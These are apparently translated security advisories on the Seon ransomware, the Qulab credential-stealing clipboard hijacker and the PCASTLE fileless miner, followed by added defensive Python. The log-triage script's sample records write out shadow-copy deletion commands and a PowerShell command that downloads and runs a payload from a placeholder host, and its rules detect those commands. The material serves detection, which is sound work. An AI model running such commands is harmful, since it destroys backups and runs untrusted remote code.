The National Computer Virus Emergency Response Center discovered a ransomware family called Seon through Internet monitoring. The attackers were found to distribute it through the Bizarro Sundown exploit kit, which is often used to spread ransomware such as GandCrab, Locky and Hermes. Seon encrypts files with the AES algorithm, changes the file extension to .FIXT, and after encryption pops up an HTA window to interact with the user and demand a ransom.
It first generates the AES key and stores it in the registry at HKEY_CURRENT_USER\Software\GNU\Display -> windowData, then obtains CPU information via assembly instructions, traverses the disks, drops a ransom-note .txt file in each directory, and encrypts files with AES. After encryption it drops startb.bat in the Temp directory and runs it; this batch file deletes disk shadow volumes and backups so that files cannot be restored from backup. Finally it drops readme.hta in the Temp directory, which contains the ransom message, and displays it with mshta.exe.
In view of the harm caused by this malicious program, users are advised to take precautions: install security software on the computers they use and update its virus database to the latest version, and patch computers promptly to fix vulnerabilities, including the Internet Explorer memory corruption vulnerability CVE-2016-0189, the Flash type confusion vulnerability CVE-2015-7645 and the Flash out-of-bounds read vulnerability CVE-2016-4117, so that their computers are not harmed by this malicious program.
The National Computer Virus Emergency Response Center found through Internet monitoring that a large number of advertising videos for "Bitcoin generators" have recently appeared on YouTube. The videos claim the tool generates Bitcoin for users for free; in fact the campaign is malicious and spreads the Qulab information-stealing and clipboard-hijacking Trojan.
The malicious program pushed in this YouTube scam is the Qulab information-stealing and clipboard-hijacking Trojan. After execution, the Trojan copies itself to %AppData%\amd64_microsoft-windows-netio-infrastructure\msaudite.module.exe and starts from that location.
The Qulab Trojan steals the user's browser history, saved browser credentials and cookies, as well as saved credentials from FileZilla, Discord and Steam. It also steals .txt, .maFile and .wallet files from the computer.
In addition, Qulab can act as a clipboard hijacker: it monitors the data that appears in the Windows clipboard and, when data is detected, can replace it with different data chosen by the attacker. In the current attack scenario, Qulab looks for cryptocurrency addresses that have been copied to the clipboard and swaps them out.
Since cryptocurrency addresses are long strings that are hard to remember, many users do not notice that the address they copied has been quietly replaced with a different one, and an attacker can steal cryptocurrency on a large scale this way.
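As an added defensive illustration (not code from the advisory), the following Python replays a sequence of clipboard observations and flags the address-for-address substitution described above. The recognised address formats, the event format and the sample addresses are assumptions constructed for the example.

```python
import re
# Address formats recognised here (an assumption; real wallets cover many more).
# The patterns check shape only, not checksums.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

def address_type(text):
    """Return the recognised address format of text, or None."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None

def detect_clipboard_swaps(events):
    """Replay (kind, text) clipboard events and report address substitutions.

    "copy" is text the user deliberately placed on the clipboard; "read" is what
    the clipboard held when sampled later, e.g. just before a paste. A "read"
    holding a different address than the last "copy" is the Qulab behaviour.
    """
    alerts = []
    last_copied = None
    for index, (kind, text) in enumerate(events):
        if kind == "copy":
            last_copied = text
        elif kind == "read" and last_copied is not None and text != last_copied:
            # Only flag address-for-address replacement, not ordinary edits.
            if address_type(last_copied) and address_type(text):
                alerts.append({"event": index, "expected": last_copied,
                               "observed": text, "kind": address_type(text)})
    return alerts

# Constructed sample: a legacy BTC address is copied, the clipboard is later found
# holding a different address of the same format (the swap), then an ETH address is fine.
SAMPLE_EVENTS = [
    ("copy", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    ("read", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    ("read", "1Fh7ajXabJBpZPZw8bjD3QU4CuQ3pRty9u"),
    ("copy", "0x52908400098527886E0F7030069857D2E4169EE7"),
    ("read", "0x52908400098527886E0F7030069857D2E4169EE7"),
]

if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(alert)
```

A wallet or exchange client can apply the same check at paste time: compare what it placed on the clipboard with what it reads back, and refuse to proceed when both are addresses but differ.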
The National Computer Virus Emergency Response Center discovered through Internet monitoring the malicious mining software PCASTLE, which uses PowerShell to spread. The attack first appeared on May 17, peaked on May 22, and then entered a stable period.
Further analysis shows that it resembles earlier campaigns that used obfuscated PowerShell scripts to spread Monero-mining malware. Judging from the distribution of victims, the attack does not target a specific industry, probably mainly because of the attack method: exploiting SMB and brute-forcing weak passwords is not an industry-specific security issue. The operators of the attack do not care who the infected users are.
Some new techniques were added in this attack. For example, it uses multiple propagation methods and spreads the cryptocurrency miner using components that perform different tasks. A multi-layered fileless approach lets a malicious PowerShell script download and execute the payload in memory. The final PowerShell script also runs in memory and bundles all the malicious routines: abusing the SMB vulnerability, brute-forcing systems, using pass-the-hash, and downloading the payload.
The attack uses XMRig as the mining module of the payload. Compared with other mining algorithms, the Monero mining algorithm does not consume many resources or require much processing power, so mining can proceed without users noticing.
In view of the harm caused by this malicious program, users are advised to use security mechanisms such as behaviour monitoring to detect and block abnormal paths and the running of unauthorized programs and scripts; firewalls and intrusion prevention systems can block malware-related traffic. Systems should also be updated and patched: the exploit used in this attack targets a vulnerability for which a patch already exists, and researchers also recommend virtual patching or embedded systems. Restrict access to system administration tools, since the use of legitimate tools to bypass detection increases the threat. Finally, harden the system: authentication and encryption mechanisms prevent unauthorized modification of the target system, and account credentials should be strengthened against brute-force and dictionary attacks.
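The following Python is an added example, not part of the advisory, showing the kind of behaviour-monitoring check recommended here: a small rule set run over constructed process-creation records to flag the shadow-copy deletion and mshta ransom-note display described for Seon above, and the encoded and in-memory download-and-execute PowerShell described for PCASTLE. The log format, rule names, paths and sample records are assumptions made for the example.

```python
import re

# Rules written for this note. The log format is an assumption: one process-creation
# record per line as "image=<path> cmd=<command line>".
RULES = {
    # Seon: the dropped .bat deletes shadow volumes and backups before the ransom note.
    "shadow-copy-deletion": re.compile(
        r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup))\b", re.I),
    # Seon: readme.hta is shown from the Temp directory through mshta.exe.
    "mshta-temp-hta": re.compile(r"mshta(\.exe)?\s+\S*\\temp\\\S+\.hta", re.I),
    # PCASTLE: obfuscated PowerShell passed as an encoded command.
    "powershell-encoded": re.compile(
        r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    # PCASTLE: fileless stage that downloads and runs the payload in memory.
    "powershell-fileless-download": re.compile(
        r"powershell(\.exe)?\b.*(DownloadString|DownloadFile|IEX|Invoke-Expression|FromBase64String)",
        re.I),
}

def triage(log_lines):
    """Return [(line_number, [rule names])] for every line matching at least one rule."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        matched = [name for name, pattern in RULES.items() if pattern.search(line)]
        if matched:
            hits.append((number, matched))
    return hits

# Constructed sample records (paths, user name, host and the encoded blob are placeholders).
SAMPLE_LOG = [
    r"image=C:\Windows\System32\vssadmin.exe cmd=vssadmin.exe delete shadows /all /quiet",
    r"image=C:\Windows\System32\wbadmin.exe cmd=wbadmin delete catalog -quiet",
    r"image=C:\Windows\System32\mshta.exe cmd=mshta.exe C:\Users\alice\AppData\Local\Temp\readme.hta",
    r"image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
    r"image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/p')",
    r"image=C:\Windows\System32\svchost.exe cmd=svchost.exe -k netsvcs",
    r"image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe Get-Process",
]

if __name__ == "__main__":
    for number, rules in triage(SAMPLE_LOG):
        print(number, ", ".join(rules))
```

The benign svchost and plain Get-Process records produce no hits, which is the point of matching on the specific destructive or in-memory-loader patterns rather than on the tool name alone.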
In view of the harm caused by this malicious program, users are advised to take precautions: install security software on the computers they use, update its virus database to the latest version, and patch computers promptly to fix vulnerabilities, so that their computers are not harmed by this malicious program.